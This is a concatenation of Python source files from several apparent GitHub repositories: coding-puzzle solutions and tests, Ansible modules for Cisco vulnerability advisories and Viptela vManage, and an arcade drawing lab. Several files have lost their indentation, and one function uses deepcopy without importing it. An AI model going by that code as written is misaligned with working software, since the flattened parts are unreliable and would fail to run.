# # Find container with same number of balls
# # # If exists remove from list
# # # If not return 'Impossible'
# Compare num remainding containers
# # If none return 'Possible'
# # Else return 'Impossible'
def organize_containers(container: [[int]]):
num_containers = len(container)
if num_containers == 0:
return 'Possible'
num_types = len(container[0])
if num_types == 0:
return 'Possible'
if num_containers != num_types:
return 'Impossible'
    type_count_map = deepcopy(container[0])  # copy so the caller's input is not mutated
box_count_map = [sum(box) for box in container]
for i in range(1, num_containers):
for j in range(len(container[i])): # Possible jagged array
type_count_map[j] += container[i][j]
sorted_type_counts = sorted(type_count_map)
sorted_box_counts = sorted(box_count_map)
return 'Possible' if sorted_type_counts == sorted_box_counts else 'Impossible'
``` |
{
"source": "JohnWebb4/toy_problems",
"score": 3
} |
#### File: src/ransomNote/ransomNote.py
```python
def check_magazine(magazine, note):
result = True
magazine_hash = {}
note_hash = {}
# Create magazine hash table
for magazine_word in magazine:
magazine_hash[magazine_word] = magazine_hash.get(magazine_word, 0) + 1
# Create note hash table
for note_word in note:
note_hash[note_word] = note_hash.get(note_word, 0) + 1
for note_word in note_hash:
if magazine_hash.get(note_word, 0) < note_hash[note_word]:
result = False
break
return "Yes" if result else "No"
``` |
{
"source": "JohnWebb4/toy-problems",
"score": 3
} |
#### File: src/ransomNote/ransomNoteTests.py
```python
import unittest
from src.ransomNote.ransomNote import check_magazine
class TestRansomNote(unittest.TestCase):
def test_missing_word(self):
self.assertEqual(check_magazine(["Give", "me", "the"], ["Give", "me", "the", "money"]), "No")
def test_give_money_with_everything(self):
self.assertEqual(check_magazine(["Give", "me", "the", "money"], ["Give", "me", "the", "money"]), "Yes")
``` |
{
"source": "JohnWebb4/toy_problems",
"score": 3
} |
#### File: src/removeDuplicates/removeDuplicatesTests.py
```python
import unittest
from src.removeDuplicates.removeDuplicates import remove_duplicates
class TestRemoveDuplicates(unittest.TestCase):
def test_remove_duplicates_5(self):
nums = [0,0,1,1,1,2,2,3,3,4]
self.assertEqual(5, remove_duplicates(nums))
self.assertEqual([0,1,2,3,4], nums)
def test_remove_duplicates_2(self):
nums = [1,1,2]
self.assertEqual(2, remove_duplicates(nums))
self.assertEqual([1,2], nums)
``` |
{
"source": "JohnWebb4/toy-problems",
"score": 4
} |
#### File: src/reverseInteger/reverseInteger.py
```python
def reverse_integer(num):
str_num = str(num).replace('-', '')[::-1]
if num < 0:
str_num = '-' + str_num
rev_num = int(str_num)
if rev_num > 2147483647:
return 0
if rev_num < -2147483648:
return 0
return rev_num
```
#### File: src/shortestPathMatrix/shortestPathMatrix.py
```python
from queue import PriorityQueue
def shortestPathBinaryMatrix(grid) -> int:
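    # Best-first search over the 8-connected grid of 0-cells, using a priority
    # queue ordered by path length plus remaining row/column distance to the goal.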
size = -1
queue = PriorityQueue()
len_grid_height = len(grid)
len_grid_width = len(grid[0])
if grid[0][0] == 1:
return -1
has_seen = {'0,0': True}
queue.put([len_grid_height + len_grid_width, 1, [0, 0]])
while not queue.empty():
next = queue.get()
current_length = next[1]
current_pos = next[2]
if current_pos[0] >= len(grid) - 1 and current_pos[1] >= len(grid[current_pos[0]]) - 1:
size = current_length
break
to_add = []
if current_pos[0] + 1 < len(grid):
new_pos = [current_pos[0] + 1, current_pos[1]]
to_add.append(new_pos)
if current_pos[1] + 1 < len(grid[current_pos[0]]):
new_pos = [current_pos[0], current_pos[1] + 1]
to_add.append(new_pos)
if current_pos[0] + 1 < len(grid) and current_pos[1] + 1 < len(grid[current_pos[0]]):
new_pos = [current_pos[0] + 1, current_pos[1] + 1]
to_add.append(new_pos)
if current_pos[0] - 1 >= 0 and current_pos[1] + 1 < len(grid[current_pos[0]]):
new_pos = [current_pos[0] - 1, current_pos[1] + 1]
to_add.append(new_pos)
if current_pos[0] + 1 < len(grid) and current_pos[1] - 1 >= 0:
new_pos = [current_pos[0] + 1, current_pos[1] - 1]
to_add.append(new_pos)
if current_pos[0] - 1 >= 0:
new_pos = [current_pos[0] - 1, current_pos[1]]
to_add.append(new_pos)
if current_pos[1] - 1 >= 0:
new_pos = [current_pos[0], current_pos[1] - 1]
to_add.append(new_pos)
if current_pos[0] - 1 >= 0 and current_pos[1] - 1 >= 0:
new_pos = [current_pos[0] - 1, current_pos[1] - 1]
to_add.append(new_pos)
for new_pos in to_add:
key = ','.join(str(e) for e in new_pos)
if grid[new_pos[0]][new_pos[1]] == 0 and not has_seen.get(key):
new_length = current_length + 1
new_cost = len_grid_height - new_pos[0] + len_grid_width - new_pos[1] + new_length
with queue.mutex:
# API not guaranteed
is_in_queue = False
for e in queue.queue:
# If I can get to this position faster
if e[2] == new_pos:
if new_length < e[1]:
e[0] = new_cost
e[1] = new_length
is_in_queue = True
break
if not is_in_queue:
queue.put([new_cost, new_length, new_pos])
has_seen[key] = True
return size
```
#### File: src/specialMultiple/specialMultiple.py
```python
def increment(digits):
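    # Step to the next larger number whose digits are all 9s or 0s, carrying like
    # binary counting (0 -> 9, 9 -> 0 with carry) and growing by one digit on overflow.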
for i in reversed(range(len(digits))):
digit = digits[i]
if digit == '0':
digits[i] = '9'
break
elif digit == '9' and i != 0:
digits[i] = '0'
continue
elif digit == '9' and i == 0:
# Add another digit and reset
digits.append('0')
digits[0] = '9'
for j in range(len(digits) - 1):
digits[j + 1] = '0'
break
return digits
def special_multiple(x):
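    # Find the smallest positive multiple of x whose decimal digits are all 9s and 0s.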
if x == 0:
return 0
digits = ['9']
value = 9
while value % x != 0:
value = int(''.join(digits))
digits = increment(digits)
return str(value)
``` |
{
"source": "johnwelby1965/openvuln",
"score": 3
} |
#### File: openvuln/filter_plugins/custom_filter.py
```python
class FilterModule(object):
def filters(self):
return {
'custom_adv_filter': self.custom_adv_filter,
'custom_net_os_filter': self.custom_net_os_filter,
}
def custom_net_os_filter(self, input_var):
net_os = input_var[0]
net_version = input_var[1]
net_version_major = net_version.split('.')[0]
if net_os == 'nxos':
output_var = 'nxos ' + net_version
elif net_os == 'ios' and net_version_major in ['12', '15']:
output_var = 'ios ' + net_version
elif net_os == 'ios' and net_version_major in ['03', '16', '17']:
output_var = 'iosxe ' + net_version
return output_var
def custom_adv_filter(self, input_var):
output_var = []
for os_loop in input_var:
print(os_loop['item']['os'])
if (os_loop['json'].get('advisories')):
for adv_loop in os_loop['json']['advisories']:
# catch two possible data structures with first fixed releases
fixed = []
if (adv_loop.get('firstFixed')):
fixed = adv_loop['firstFixed']
else:
fixed = adv_loop['platforms'][0]['firstFixes'][0]['name']
# catch cvss score string that contains no number
try:
cvss_float = float(adv_loop['cvssBaseScore'])
except ValueError:
cvss_float = 0.0
output_var.append({ 'os': os_loop['item']['os'],
'id': adv_loop['advisoryId'],
'sir': adv_loop['sir'],
'cvss': cvss_float,
'cve': adv_loop.get('cves', []),
'url': adv_loop['publicationUrl'],
'fixed': fixed
})
return output_var
``` |
{
"source": "johnwelby1965/viptela",
"score": 2
} |
#### File: viptela/library/vmanage_feature_template.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
from ansible.module_utils.basic import AnsibleModule, json
from ansible.module_utils.viptela import viptelaModule, viptela_argument_spec
from collections import OrderedDict
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = viptela_argument_spec()
argument_spec.update(state=dict(type='str', choices=['absent', 'present'], default='present'),
name=dict(type='str', alias='templateName'),
description=dict(type='str', alias='templateDescription'),
definition=dict(type='dict', alias='templateDefinition'),
template_type=dict(type='str', alias='templateType'),
device_type=dict(type='list', alias='deviceType'),
template_min_version=dict(type='str', alias='templateMinVersion'),
factory_default=dict(type='bool', alias='factoryDefault'),
url=dict(type='bool', alias='templateUrl'),
aggregate=dict(type='list'),
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
viptela = viptelaModule(module)
# Always as an aggregate... make a list if just given a single entry
if viptela.params['aggregate']:
feature_template_list = viptela.params['aggregate']
else:
if viptela.params['state'] == 'present':
try:
feature_template_list = [
{
'templateName': viptela.params['name'],
'templateDescription': viptela.params['description'],
'deviceType': viptela.params['device_type'],
'templateDefinition': viptela.params['definition'],
'templateType': viptela.params['template_type'],
'templateMinVersion': viptela.params['template_min_version'],
'factoryDefault': viptela.params['factory_default']
}
]
except:
module.fail_json(
msg="Required values: name, description, device_type, definition, template_type, template_min_version, factory_default")
else:
try:
feature_template_list = [
{
'templateName': viptela.params['name']
}
]
except:
module.fail_json(
msg='Required values: name'
)
feature_template_dict = viptela.get_feature_template_dict(factory_default=True, remove_key=False)
ignore_values = ["lastUpdatedOn", "lastUpdatedBy", "templateId", "createdOn", "createdBy"]
compare_values = ['templateDescription', 'deviceType', 'templateType', 'templateDefinition', 'templateMinVersion']
for feature_template in feature_template_list:
if viptela.params['state'] == 'present':
payload = {
'templateName': feature_template['templateName'],
'templateDescription': feature_template['templateDescription'],
'deviceType': feature_template['deviceType'],
'templateType': feature_template['templateType'],
'templateMinVersion': feature_template['templateMinVersion'],
'factoryDefault': feature_template['factoryDefault'],
'templateDefinition': feature_template['templateDefinition']
}
# FIXME (Issue #1): This is a temporary workaround for the fact that vManage requires it payload in a specific order
template_definition = OrderedDict()
if 'if-name' in feature_template['templateDefinition']:
template_definition['if-name'] = feature_template['templateDefinition'].pop('if-name')
if 'vpn-id' in feature_template['templateDefinition']:
template_definition['vpn-id'] = feature_template['templateDefinition'].pop('vpn-id')
for key, value in feature_template['templateDefinition'].items():
template_definition[key] = value
payload['templateDefinition'] = template_definition
if payload['templateName'] in feature_template_dict:
viptela.result['changed'] = False
# changed_items = viptela.compare_payloads(payload, feature_template_dict[payload['templateName']], compare_values=compare_values)
# if changed_items:
# viptela.result['changed'] = True
# viptela.result['what_changed'] = changed_items
# if not module.check_mode:
# viptela.request('/dataservice/template/feature/{0}'.format(feature_template_dict[payload['templateName']]['templateId']),
# method='PUT', payload=payload)
else:
if not module.check_mode:
viptela.request('/dataservice/template/feature/', method='POST', payload=payload)
viptela.result['changed'] = True
else:
if feature_template['templateName'] in feature_template_dict:
if not module.check_mode:
viptela.request('/dataservice/template/feature/{0}'.format(
feature_template_dict[feature_template['templateName']]['templateId']),
method='DELETE')
viptela.result['changed'] = True
viptela.exit_json(**viptela.result)
def main():
run_module()
if __name__ == '__main__':
main()
```
#### File: viptela/library/vmanage_policy_list_facts.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
import requests
from ansible.module_utils.basic import AnsibleModule, json
from ansible.module_utils.viptela import viptelaModule, viptela_argument_spec
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = viptela_argument_spec()
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
viptela = viptelaModule(module)
# vSmart policies
# response = viptela.request('/dataservice/template/policy/vsmart')
# response_json = response.json()
# vsmart_policies = response_json['data']
policy_lists = {}
# for list_type in viptela.POLICY_LIST_TYPES:
# list = viptela.get_policy_list_list(list_type)
# policy_lists[list_type] = list
policy_lists = viptela.get_policy_list_list('all')
# # Prefix lists
# prefix_lists = viptela.get_policy_list_list('prefix')
#
# # VPN lists
# vpn_lists = viptela.get_policy_list_list('vpn')
#
# policy_lists = {
# # 'vsmart_policies': vsmart_policies,
# 'vmanage_site_lists': site_lists,
# 'vmanage_prefix_lists': prefix_lists,
# 'vmanage_vpn_lists': vpn_lists,
# }
viptela.result['policy_lists'] = policy_lists
viptela.exit_json(**viptela.result)
def main():
run_module()
if __name__ == '__main__':
main()
```
#### File: viptela/library/vmanage_software_upload.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
#### CAN WE DO THIS ????
import os
from ansible.module_utils.basic import AnsibleModule, json
from ansible.module_utils.viptela import viptelaModule, viptela_argument_spec
from collections import OrderedDict
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = viptela_argument_spec()
argument_spec.update(state=dict(type='str', choices=['absent', 'present'], default='present'),
file=dict(type='str'),
aggregate=dict(type='list')
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
viptela = viptelaModule(module)
if viptela.params['aggregate']:
upload_software_list = viptela.params['aggregate']
else:
upload_software_list = [
{
'file': module.params['file']
}
]
# THIS MODULE IS DESIGNED TO UPLOAD UPGRADE IMAGES TO THE VMANAGE
# Software in SD-WAN varies depending on what you want to upgrade.
# This is a complication for what concern idempotency of this module
# Files to upgrade vmanage will look like: vmanage-XX.YY.ZZ-<platform>.tar.gz
# Files to upgrade vedge cloud/vedge 5k/vbond/vsmart will look like: viptela-XX.YY.ZZ-<platform>.tar.gz
# Physical appliances will NOT have incremental upgrade images
# CISCO Physical appliances will be upgraded via a new .bin file
# VIPTELA Physical appliances will be upgraded via a new .tar.gz file
viptela.result['changed'] = False
vManage_software_list = viptela.get_software_images_list()
if viptela.params['state'] == 'present':
for software_to_upload in upload_software_list:
try:
present = False
path_software_to_be_uploaded = software_to_upload['file']
if not os.path.exists(path_software_to_be_uploaded):
module.fail_json(
msg="File does not exists")
filename_software_to_be_uploaded = os.path.basename(path_software_to_be_uploaded)
for software in vManage_software_list:
availabe_files_list = software["availableFiles"].split(', ')
if filename_software_to_be_uploaded in availabe_files_list:
present = True
if not module.check_mode and not present:
response = viptela.request('/dataservice/device/action/software/package', method='POST',
files={'file': open(path_software_to_be_uploaded, 'rb')},
data={'validity':'valid', 'upload':'true'},
headers=None)
viptela.result['changed'] = True
except Exception as e:
module.fail_json(
msg="General Error {0}".format(e))
else:
# absent to be added
pass
viptela.exit_json(**viptela.result)
def main():
run_module()
if __name__ == '__main__':
main()
``` |
{
"source": "johnwen84/my-php-buildpack",
"score": 2
} |
#### File: lib/php/extension.py
```python
import os
import string
import json
import glob
from build_pack_utils import utils
from compile_helpers import convert_php_extensions
from compile_helpers import is_web_app
from compile_helpers import find_stand_alone_app_to_run
from compile_helpers import load_manifest
from compile_helpers import find_all_php_versions
from compile_helpers import validate_php_version
from compile_helpers import validate_php_extensions
from compile_helpers import validate_php_ini_extensions
from compile_helpers import include_fpm_d_confs
from extension_helpers import ExtensionHelper
def find_composer_paths(ctx):
build_dir = ctx['BUILD_DIR']
webdir = ctx['WEBDIR']
json_path = None
lock_path = None
json_paths = [
os.path.join(build_dir, 'composer.json'),
os.path.join(build_dir, webdir, 'composer.json')
]
lock_paths = [
os.path.join(build_dir, 'composer.lock'),
os.path.join(build_dir, webdir, 'composer.lock')
]
env_path = os.getenv('COMPOSER_PATH')
if env_path is not None:
json_paths = json_paths + [
os.path.join(build_dir, env_path, 'composer.json'),
os.path.join(build_dir, webdir, env_path, 'composer.json')
]
lock_paths = lock_paths + [
os.path.join(build_dir, env_path, 'composer.lock'),
os.path.join(build_dir, webdir, env_path, 'composer.lock')
]
for path in json_paths:
if os.path.exists(path):
json_path = path
for path in lock_paths:
if os.path.exists(path):
lock_path = path
return (json_path, lock_path)
class PHPExtension(ExtensionHelper):
def _should_compile(self):
return self._ctx['PHP_VM'] == 'php'
def _configure(self):
manifest = load_manifest(self._ctx)
dependencies = manifest['dependencies']
self._ctx['ALL_PHP_VERSIONS'] = find_all_php_versions(dependencies)
def _preprocess_commands(self):
return (('$HOME/.bp/bin/rewrite', '"$HOME/php/etc"'),)
def _service_commands(self):
if is_web_app(self._ctx):
return {
'php-fpm': (
'$HOME/php/sbin/php-fpm',
'-p "$HOME/php/etc"',
'-y "$HOME/php/etc/php-fpm.conf"',
'-c "$HOME/php/etc"')
}
else:
app = find_stand_alone_app_to_run(self._ctx)
return {
'php-app': (
'$HOME/php/bin/php',
'-c "$HOME/php/etc"',
app)
}
def _service_environment(self):
env = {
'LD_LIBRARY_PATH': '$LD_LIBRARY_PATH:$HOME/php/lib',
'PATH': '$PATH:$HOME/php/bin:$HOME/php/sbin',
'PHPRC': '$HOME/php/etc'
}
if 'snmp' in self._ctx['PHP_EXTENSIONS']:
env['MIBDIRS'] = '$HOME/php/mibs'
php_ini_d_path = os.path.join(self._ctx['BUILD_DIR'], 'php', 'etc', 'php.ini.d')
if os.path.exists(php_ini_d_path):
env['PHP_INI_SCAN_DIR'] = '$HOME/php/etc/php.ini.d/'
return env
def _compile(self, install):
ctx = install.builder._ctx
(composer_json_file, composer_lock_file) = find_composer_paths(ctx)
options_json_file = os.path.join(ctx['BUILD_DIR'],'.bp-config', 'options.json')
if (os.path.isfile(options_json_file) and composer_json_file and os.path.isfile(composer_json_file)):
# options.json and composer.json both exist. Check to see if both define a PHP version.
composer_json = json.load(open(composer_json_file,'r'))
options_json = json.load(open(options_json_file,'r'))
if composer_json.get('require', {}).get('php') and options_json.get("PHP_VERSION"):
print('WARNING: A version of PHP has been specified in both `composer.json` and `./bp-config/options.json`.')
print('WARNING: The version defined in `composer.json` will be used.')
if ctx.get('OPTIONS_JSON_HAS_PHP_EXTENSIONS', False):
print("Warning: PHP_EXTENSIONS in options.json is deprecated. See: http://docs.cloudfoundry.org/buildpacks/php/gsg-php-config.html")
print 'Installing PHP'
validate_php_version(ctx)
print 'PHP %s' % (ctx['PHP_VERSION'])
major_minor = '.'.join(string.split(ctx['PHP_VERSION'], '.')[0:2])
(install
.package('PHP')
.done())
validate_php_ini_extensions(ctx)
validate_php_extensions(ctx)
convert_php_extensions(ctx)
include_fpm_d_confs(ctx)
(install
.config()
.from_application('.bp-config/php') # noqa
.or_from_build_pack('defaults/config/php/%s.x' % major_minor)
.to('php/etc')
.rewrite()
.done())
return 0
# Register extension methods
PHPExtension.register(__name__)
``` |
{
"source": "JohnWes7/Auto-AzurLane",
"score": 3
} |
#### File: Auto-AzurLane/bin/screenshots.py
```python
import os
if __name__ == '__main__':
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from src.adb import Adb
from src.path import Path
from src.config import Config
def run():
    a = Adb(adbpath=Path.get_adb_path(), screenshots_dir=Path.get_screenshots_dir(), hostport=Config.get_hostport())
a.check()
a.screenshots()
    print(f'Screenshot saved to {a.get_screenshots_path()}')
if __name__ == '__main__':
run()
```
#### File: Auto-AzurLane/src/config.py
```python
import configparser
from src.path import Path
class Config:
__ini = None
@classmethod
def __getconfig(cls):
if cls.__ini:
return cls.__ini
cls.__ini = configparser.ConfigParser()
cls.__ini.read(Path.get_configini_path(), encoding='utf-8')
return cls.__ini
@classmethod
def get_hostport(cls):
return cls.__getconfig().get('general', 'hostport')
``` |
{
"source": "johnwesleyharding/DSsprint9Sleepless",
"score": 3
} |
#### File: Sleepless/modules/test.py
```python
from whatever import addition
import unittest
class FunctTester(unittest.TestCase):
"""
nope
"""
def test_addition(self):
try:
self.assertEqual(addition(1, 1), 10)
except:
pass
def test_zebisnotatl(self):
pass
if __name__ == '__main__':
unittest.main()
```
#### File: Sleepless/modules/weather_test.py
```python
import unittest
class TempTrack:
""" TemperatureTracker """
def __init__(self):
        # necessary?
self.temps = [0] * 140
self.num_temps = 0
self.min = 140
self.max = -1
self.total = 0
self.mean = None
self.max_freq = 0
self.mode = None
def insert(self, temp):
if temp < 0 or temp > 140:
raise Exception
self.temps[temp] += 1
self.num_temps += 1
if temp < self.min:
self.min = temp
if temp > self.max:
self.max = temp
self.total += temp
self.mean = self.total / float(self.num_temps)
if self.temps[temp] > self.max_freq:
self.max_freq = self.temps[temp]
self.mode = temp
def get_max(self):
        max = self.max
if max == -1:
max = None
return max
def get_min(self):
min = self.min
if min == 140:
min = None
return min
def get_mean(self):
return self.mean
def get_mode(self):
return self.mode
class TestTempTracker(unittest.TestCase):
def _test_tracker(self, temps, min, max, mean, modes):
tracker = TempTrack()
for temp in temps:
tracker.insert(temp)
print("")
print("Test: temps = %s" % temps)
print(" min %s max %s" % (tracker.get_min(), tracker.get_max()))
#self.assertTrue(tracker.get_min() == min)
self.assertTrue(tracker.get_max() == max)
print(" mean %s mode %s" % (tracker.get_mean(), tracker.get_mode()))
self.assertTrue(tracker.get_mean() == mean)
self.assertTrue(tracker.get_mode() in modes)
def test_null(self):
self._test_tracker([], None, None, None, [None])
def test_0(self):
self._test_tracker([0], 0, 0, 0, [0])
def test_01(self):
self._test_tracker([0, 1], 0, 1, 0.5, [0, 1])
def test_011(self):
self._test_tracker([0, 1, 1], 0, 1, 2 / 3.0, [1])
def test_0112(self):
self._test_tracker([0, 1, 1, 2], 0, 2, 4 / 4.0, [1])
def test_0111225(self):
self._test_tracker([0, 1, 1, 2, 2, 5], 0, 5, 11 / 6.0, [1, 2])
def test_011122555(self):
self._test_tracker([0, 1, 1, 2, 2, 5, 5, 5], 0, 5, 21 / 8.0, [5])
def test_extremes(self):
tracker = TempTrack()
self.assertRaises(Exception, tracker.insert, -1)
#self.assertRaises(Exception, tracker.insert, 111)
if __name__ == "__main__":
# unittest.main()
suite = unittest.TestLoader().loadTestsFromTestCase(TestTempTracker)
unittest.TextTestRunner(verbosity=2).run(suite)
``` |
{
"source": "johnwesleyharding/DS-Unit-3-Sprint-2-SQL-and-Databases",
"score": 4
} |
#### File: DS-Unit-3-Sprint-2-SQL-and-Databases/module1-introduction-to-sql/rpg_queries_jwh.py
```python
import sqlite3
import pandas as pd
# PART 1 ------------------------------------- Notebook code more recent
def query(q, db = sqlite3.connect('rpg_db.sqlite3')):
cursor = db.cursor()
cursor.execute(q)
result = cursor.fetchall()
cursor.close()
db.commit()
return result
# How many total Characters are there?
q = "SELECT COUNT (*)\
FROM charactercreator_character;"
resultc = query(q)
print(f'{resultc[0][0]} total characters.')
# How many of each specific subclass?
result = query('SELECT COUNT (*) FROM charactercreator_fighter;')
print(f'{result[0][0]} fighters.')
result = query('SELECT COUNT (*) FROM charactercreator_cleric;')
print(f'{result[0][0]} clerics.')
result = query('SELECT COUNT (*) FROM charactercreator_thief;')
print(f'{result[0][0]} thieves.')
result = query('SELECT COUNT (*) FROM charactercreator_mage;')
resultn = query('SELECT COUNT (*) FROM charactercreator_necromancer;')
print(f'{result[0][0]} mages including {resultn[0][0]} necromancers.')
# How many total Items?
resulti = query('SELECT COUNT (*) FROM armory_item;')
print(f'{resulti[0][0]} total items.')
# How many of the Items are weapons? How many are not?
resultw = query('SELECT COUNT (*) FROM armory_weapon;')
print(f'{resultw[0][0]} weapons, {resulti[0][0] - resultw[0][0]} other items.')
# How many Items does each character have? (Return first 20 rows)
result = query('SELECT COUNT(character_id) FROM charactercreator_character_inventory GROUP BY character_id LIMIT 20;')
for i in range(len(result)):
print(f'Character ID: {i + 1} has {result[i][0]} items.')
# How many Weapons does each character have? (Return first 20 rows)
result = query('SELECT cc.character_id as ID, cc.name as person, count(aw.power) as weapons FROM charactercreator_character as cc, charactercreator_character_inventory as cci, armory_weapon as aw WHERE cc.character_id = cci.character_id AND aw.item_ptr_id = cci.item_id GROUP BY cc.character_id ORDER BY weapons DESC, person LIMIT 20;')
for i in range(len(result)):
print(f'{result[i][1]} has {result[i][2]} weapons.')
# On average, how many Items does each Character have?
result = query('SELECT COUNT (*) FROM charactercreator_character_inventory;')
print(f'{round(result[0][0] / resultc[0][0], 2)} average items per character')
# On average, how many Weapons does each character have?
result = query('SELECT COUNT(*) FROM charactercreator_character_inventory as cci, armory_weapon as aw WHERE cci.item_id = aw.item_ptr_id;')
print(f'{round(result[0][0] / resultc[0][0], 2)} average weapons per character')
# PART 2 -------------------------------------
def query(q, db = sqlite3.connect('buddymove_holidayiq.sqlite3')):
cursor = db.cursor()
cursor.execute(q)
result = cursor.fetchall()
cursor.close()
db.commit()
return result
# Open a connection to a new (blank) database file buddymove_holidayiq.sqlite3
db = sqlite3.connect('buddymove_holidayiq.sqlite3')
# Use df.to_sql (documentation) to insert the data into a new table review in the SQLite3 database
df = pd.read_csv('buddymove_holidayiq.csv')
df.to_sql('review', db)
# Count how many rows you have - it should be 249!
result = query('SELECT COUNT(*) FROM review;')
print(f'{result[0][0]} rows.')
# How many users who reviewed at least 100 Nature in the category also reviewed at least 100 in the Shopping category?
result = query('SELECT COUNT(*) FROM review WHERE Nature >= 100 AND Shopping >= 100;')
print(f'{result[0][0]} users are interested in nature and shopping.')
# (Stretch) What are the average number of reviews for each category?
for category in ['Sports', 'Religious', 'Nature', 'Theatre', 'Shopping', 'Picnic']:
q = f'SELECT AVG({category}) FROM review;'
result = query(q)
print(f'Average interest in {category}: {round(result[0][0])}')
``` |
{
"source": "johnwesleyharding/lambdata_johnwesleyharding",
"score": 3
} |
#### File: lambdata_johnwesleyharding/lambdata_johnwesleyharding/__init__.py
```python
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
"""
"""
def trainvalidtest(df, features, target):
train, test = train_test_split(df)
X_train, X_valid, y_train, y_valid = train_test_split(train[features], train[target])
X_test = test[features]
y_test = test[target]
return X_train, X_valid, y_train, y_valid, X_test, y_test
"""
"""
def monthdayyear(dataframe, datefeature):
def createmonth(date):
return date[:2]
dataframe['Month'] = dataframe[datefeature].apply(createmonth)
def createday(date):
return date[3:5]
dataframe['Day'] = dataframe[datefeature].apply(createday)
def createyear(date):
return date[6:]
dataframe['Year'] = dataframe[datefeature].apply(createyear)
return dataframe
``` |
{
"source": "john-westcott-iv/orionsdk-python",
"score": 2
} |
#### File: orionsdk-python/samples/nta_enable_disable_cbqos_sources.py
```python
from __future__ import print_function
import re
import requests
import pprint
from orionsdk import SwisClient
def main():
# Connect to SWIS
server = 'localhost'
username = 'admin'
password = ''
swis = SwisClient(server, username, password)
# Disable/Enable CBQoS Sources
node_caption = 'My testing router'
query_results = swis.query('SELECT NodeID FROM Orion.Nodes WHERE Caption = @nodecaption_par', nodecaption_par=node_caption)
node_id = query_results['results'][0]['NodeID']
query_results = swis.query('SELECT Uri FROM Orion.Netflow.CBQoSSource WHERE NodeID = @nodeid_par', nodeid_par = node_id)
enabled_flag = False # Change this value to True if you want to enable sources
props = {
'Enabled': enabled_flag
}
for row in query_results['results']:
swis.update(row['Uri'], **props)
# Print results
query_results = swis.query('SELECT CBQoSSourceID FROM Orion.Netflow.CBQoSSource WHERE NodeID = @nodeid_par and Enabled = @enabled_par',
nodeid_par=node_id, enabled_par=enabled_flag)
print('Changed enabled status to {0} for {1} CBQoS sources for node with ID {2}'
.format(enabled_flag, len(query_results['results']), node_id))
if __name__ == '__main__':
main()
``` |
{
"source": "john-w-estes/csc121",
"score": 4
} |
#### File: csc121/lab6/lab6.py
```python
import arcade
def draw_section_outlines():
color = arcade.color.BLACK
#Draw squares on bottom
arcade.draw_rectangle_outline(150, 150, 300, 300, color)
arcade.draw_rectangle_outline(450, 150, 300, 300, color)
arcade.draw_rectangle_outline(750, 150, 300, 300, color)
arcade.draw_rectangle_outline(1050, 150, 300, 300, color)
#Draw squares on top
arcade.draw_rectangle_outline(150, 450, 300, 300, color)
arcade.draw_rectangle_outline(450, 450, 300, 300, color)
arcade.draw_rectangle_outline(750, 450, 300, 300, color)
arcade.draw_rectangle_outline(1050, 450, 300, 300, color)
#First section
def draw_section_1():
for row in range(30):
for col in range(30):
x = 10 * (row + .5)
y = 10 * (col + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Second section
def draw_section_2():
for row in range(30):
for col in range(30):
x = 300 + 10 * (row + .5)
y = 10 * (col + .5)
if (row)%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
#Third section
def draw_section_3():
for row in range(30):
for col in range(30):
x = 600 + 10 * (row + .5)
y = 10 * (col + .5)
if (col)%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
#Fourth Section
def draw_section_4():
for row in range(30):
for col in range(30):
x = 900 + 10 * (row + .5)
y = 10 * (col + .5)
if row%2 != 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
elif row%2 == 0 and col%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
#Fifth Section
def draw_section_5():
for row in range(30):
for col in range(row):
x = 10 * (row + .5)
y = 300 + 10 * (col + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Sixth Section
def draw_section_6():
for row in range(30):
for col in range(30-row):
x = 300 + 10 * (row + .5)
y = 300 + 10 * (col + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Seventh Section
def draw_section_7():
for row in range(31):
for col in range(row):
x = 600 + 10 * (col + .5)
y = 300 + 10 * (row + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Eighth Section
def draw_section_8():
for row in range(30):
for col in range(row):
x = 900 + 10 * (29 - col + .5)
y = 300 + 10 * (row + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def main():
#Create a window
